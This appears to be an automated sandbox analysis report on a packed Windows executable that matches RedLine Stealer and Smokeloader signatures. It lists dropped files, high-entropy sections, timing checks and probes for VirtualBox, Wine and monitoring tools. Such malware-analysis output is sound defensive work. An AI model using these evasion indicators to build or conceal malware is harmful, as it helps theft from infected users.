                Source: Yara matchFile source: 1.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.3.file.exe.4a20000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.1309173402.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: 00000001.00000002.2025597799.0000000004780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00403D401_2_00403D40
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00402EE01_2_00402EE0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00404F701_2_00404F70
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004109401_2_00410940
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0041A3461_2_0041A346
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040EBC71_2_0040EBC7
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00415E591_2_00415E59
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040B6D01_2_0040B6D0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040EF091_2_0040EF09
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0041572E1_2_0041572E
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_1000E1841_2_1000E184
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_100102A01_2_100102A0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_006018461_2_00601846
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005DA0741_2_005DA074
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005D34241_2_005D3424
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005DF0C21_2_005DF0C2
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004880F81_2_004880F8
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005DBC9E1_2_005DBC9E
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005E25761_2_005E2576
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005E41171_2_005E4117
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005CFD321_2_005CFD32
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005CC92C1_2_005CC92C
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005D19231_2_005D1923
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00480DE61_2_00480DE6
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005451A11_2_005451A1
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005E0E0A1_2_005E0E0A
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004CAA361_2_004CAA36
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005D6AC21_2_005D6AC2
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005252FE1_2_005252FE
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005DD6911_2_005DD691
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004942981_2_00494298
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004BBE931_2_004BBE93
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004FBAAA1_2_004FBAAA
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005CAEA61_2_005CAEA6
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005D4F441_2_005D4F44
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005CE32C1_2_005CE32C
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_006F5E561_2_006F5E56
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_006F5E841_2_006F5E84
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_006F5E931_2_006F5E93
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_049351D71_2_049351D7
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0493EE2E1_2_0493EE2E
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_04933FA71_2_04933FA7
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_049459951_2_04945995
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_049351D71_2_049351D7
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0493B9371_2_0493B937
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0493F1701_2_0493F170
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_04940BA71_2_04940BA7
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1] F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 0493AA07 appears 35 times
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 10003160 appears 34 times
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 0040A7A0 appears 35 times
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4708 -s 644
                Source: file.exe, 00000001.00000003.1734839314.000000000526C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs file.exe
                Source: file.exe, 00000001.00000003.1734619327.0000000005DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameY-Cleaner.exe4 vs file.exe
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 00000001.00000002.2025597799.0000000004780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: Y-Cleaner.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: soft[1].1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: file.exeStatic PE information: Section: ZLIB complexity 0.9951234076433121
                Source: file.exeStatic PE information: Section: olgpsnjw ZLIB complexity 0.99229768222981
                Source: classification engineClassification label: mal100.troj.evad.winEXE@2/15@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,1_2_00402A50
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_04788464 CreateToolhelp32Snapshot,Module32First,1_2_04788464
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00401970 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,1_2_00401970
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\add[1].htmJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4708
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user~1\AppData\Local\Temp\23RE4w32fNJump to behavior
                Source: C:\Users\user\Desktop\file.exeCommand line argument: nosub1_2_004087E0
                Source: C:\Users\user\Desktop\file.exeCommand line argument: mixtwo1_2_004087E0
                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeReversingLabs: Detection: 31%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4708 -s 644
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: linkinfo.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: Cleaner.lnk.1.drLNK file: ..\AppData\Local\Temp\23RE4w32fN\Y-Cleaner.exe
                Source: file.exeStatic file information: File size 1995776 > 1048576
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: file.exeStatic PE information: Raw size of olgpsnjw is bigger than: 0x100000 < 0x1a5000

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 1.2.file.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;olgpsnjw:EW;sccxqdxh:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: Y-Cleaner.exe.1.drStatic PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: dll[1].1.drStatic PE information: real checksum: 0x0 should be: 0x400e1
                Source: Y-Cleaner.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x170243
                Source: soft[1].1.drStatic PE information: real checksum: 0x0 should be: 0x170243
                Source: file.exeStatic PE information: real checksum: 0x1e843a should be: 0x1f6ecf
                Source: Bunifu_UI_v1.5.3.dll.1.drStatic PE information: real checksum: 0x0 should be: 0x400e1
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: olgpsnjw
                Source: file.exeStatic PE information: section name: sccxqdxh
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040A237 push ecx; ret 1_2_0040A24A
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00421B7D push esi; ret 1_2_00421B86
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_1000E891 push ecx; ret 1_2_1000E8A4
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005F5497 push ecx; mov dword ptr [esp], esi1_2_005F8363
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005F5497 push edi; mov dword ptr [esp], esp1_2_005F8367
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005F4CB5 push 186079D5h; mov dword ptr [esp], edi1_2_005F7347
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0060B06B push 1093FA19h; mov dword ptr [esp], edx1_2_0060B0F1
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0060B06B push 466D9CC7h; mov dword ptr [esp], eax1_2_0060B10E
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_006D487F push eax; ret 1_2_006D488E
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_006C687B push 1AB8BC02h; mov dword ptr [esp], edx1_2_006C6883
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00601846 push 03F8F741h; mov dword ptr [esp], ecx1_2_00601900
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00601846 push 6842EF4Ah; mov dword ptr [esp], ebx1_2_0060192F
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_006B2058 push 68E70CBCh; mov dword ptr [esp], esp1_2_006B20D4
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0065C05D push esi; mov dword ptr [esp], eax1_2_0065C0BC
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00690832 push 45CCCACCh; mov dword ptr [esp], esi1_2_00690865
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00690832 push ecx; mov dword ptr [esp], 55ED2DE4h1_2_00690883
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00684037 push edi; mov dword ptr [esp], ecx1_2_00684071
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0067F803 push 69F21E02h; mov dword ptr [esp], ecx1_2_0067F860
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00651012 push 77CB7FF6h; mov dword ptr [esp], ebp1_2_0065104B
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_006C601B push ebx; mov dword ptr [esp], esi1_2_006C603E
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_006648CD push 529E7051h; mov dword ptr [esp], esi1_2_00664904
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_006648CD push 366DB9F7h; mov dword ptr [esp], ebx1_2_00664928
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0068F0D1 push ecx; mov dword ptr [esp], edi1_2_0068F17A
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0065A8AA push edx; mov dword ptr [esp], ecx1_2_0065A8DB
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0065A8AA push 01276239h; mov dword ptr [esp], ebx1_2_0065A95B
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_006ED89C push 301729F5h; mov dword ptr [esp], esi1_2_006ED8C8
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0060309A push 6E37A73Dh; mov dword ptr [esp], ecx1_2_006030D7
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00654973 push eax; mov dword ptr [esp], 4C2A23B8h1_2_006549B1
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_006AA94D push 4B1E0A33h; mov dword ptr [esp], ebx1_2_006AA973
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_006BA136 push 49BEE2D7h; mov dword ptr [esp], ebx1_2_006BA1D9
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0066E110 push eax; mov dword ptr [esp], ebx1_2_0066E131
                Source: file.exeStatic PE information: section name: entropy: 7.942270007630704
                Source: file.exeStatic PE information: section name: olgpsnjw entropy: 7.949609738056107
                Source: Y-Cleaner.exe.1.drStatic PE information: section name: .text entropy: 7.918511524700298
                Source: soft[1].1.drStatic PE information: section name: .text entropy: 7.918511524700298
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\23RE4w32fN\Bunifu_UI_v1.5.3.dllJump to dropped file
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1]Jump to dropped file
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]Jump to dropped file
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\23RE4w32fN\Y-Cleaner.exeJump to dropped file
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1]Jump to dropped file
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]Jump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E9EAA second address: 5E9EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E9EAE second address: 5E9EB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CDE82 second address: 5CDE86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CDE86 second address: 5CDE8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CDE8E second address: 5CDE93 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E92B7 second address: 5E92E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jo 00007FCBA46BC736h 0x0000000b jmp 00007FCBA46BC744h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ecx 0x00000014 jns 00007FCBA46BC742h 0x0000001a jo 00007FCBA46BC736h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E9421 second address: 5E9428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E9428 second address: 5E942D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E9704 second address: 5E9734 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FCBA4817E7Ch 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 jmp 00007FCBA4817E86h 0x00000017 pop ecx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E9734 second address: 5E973C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E973C second address: 5E9740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
